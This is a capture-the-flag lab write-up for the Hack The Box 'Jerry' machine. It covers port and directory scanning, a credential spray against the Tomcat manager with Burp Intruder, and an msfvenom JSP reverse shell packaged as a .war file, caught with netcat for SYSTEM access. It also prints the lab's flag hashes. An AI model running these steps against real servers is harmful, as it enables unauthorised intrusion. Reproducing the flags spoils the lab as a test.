Windows Boxes

jerry

  1. nmap
  2. http
    1. gobuster
    2. /manager
  3. passwordspray Tomcat server
    1. default passwords
    2. default passwords b64
    3. Intruder
  4. initial foothold
    1. msfvenom .war reverse shell
    2. .war upload and run
  5. user/root
  6. lessons learned

jerry

images/6-1.png
images/6-2.png

nmap

nmap -sC -sV -oA nmap/initial 10.10.10.95
images/7-1.png
we have an Apache Tomcat server running JSP 1.1 on port 8080

http

images/465-1.png

images/465-2.png



gobuster

running gobuster on our target

gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirbustser/directory-list-2.3-medium.txt
images/486-1.png
/docs
/examples
/shell don't lead to any important findings,

however /manager access could allow us remote code execution on this box

/manager

images/487-1.png
images/487-2.png

and capturing the authentication packet with burpsuite shows us the server uses basic authorization, which encodes both the username and password in base64
images/487-3.png

passwordspray Tomcat server

default passwords
default passwords base 64
Intruder

default passwords

lets search for default usernames and passwords on google and either copy or make our own list to try and bruteforce authentication to the tomcat server manager page
images/41-1.png
images/41-2.png
images/41-3.png

Tomcat server default password list:
images/41-4.png

default passwords b64

now that we have our username and password list, we

images/42-1.png
images/42-2.png

Intruder

images/43-1.png
images/43-2.png
images/43-3.png
images/43-4.png
intruder shows that the dG9tY2F0OnMzY3JldA== returns a status code server response 200 and response length of 19248 bytes, because it is an outlier to the rest of intruder's password attempts, it is safe to assume we have ourselves a successful login!

images/43-5.png
we can use burpsuite's built in base64 decoder on the string to reveal our username and password are
tomcat:s3cret


Note: Only use Intuder for small user/password payloads unless you have the professional edition of burp suite, it runs very slow in comparison to other freeware webapp bruteforcers such as hydra

initial foothold

using username tomcat password s3cret on the manager login form
images/1047-1.png

logs us into the Tomcat Web Application Manager!
images/1047-2.png
images/1047-3.png
images/1047-4.png
images/1047-5.png
images/1047-6.png

msfvenom .war reverse shell

on manager page after login there is an upload feature on the webserver that allows .war uploads
images/1049-1.png
Note: make sure its a java/jsp_reverse_tcp payload for war files because tomcat servers are run .war files that run java payloads

we're going to use msfvenom to generate a reverse shell payload written in .war, find payloads to this and more here
images/1049-2.png
images/1049-3.png

msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.62 LPORT=9876 -o newshell.war
images/1049-4.png

.war upload and run

images/44-1.png

clicking the newly generated shell2 link or navigating to its location in our browser will both execute our .war payload and send a reverse shell back to our machine!
images/44-2.png
nc -nlvp 9876
images/44-3.png
and we're system!

user/root

images/489-1.png
7004dbcef0f854e0fb401875f26ebd00
04a8b36e1545a455393d067e772fe90e

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1050-1.png